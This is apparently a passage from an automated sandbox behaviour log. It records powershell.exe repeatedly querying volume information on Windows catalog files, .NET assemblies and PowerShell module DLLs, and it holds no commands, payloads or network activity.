          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
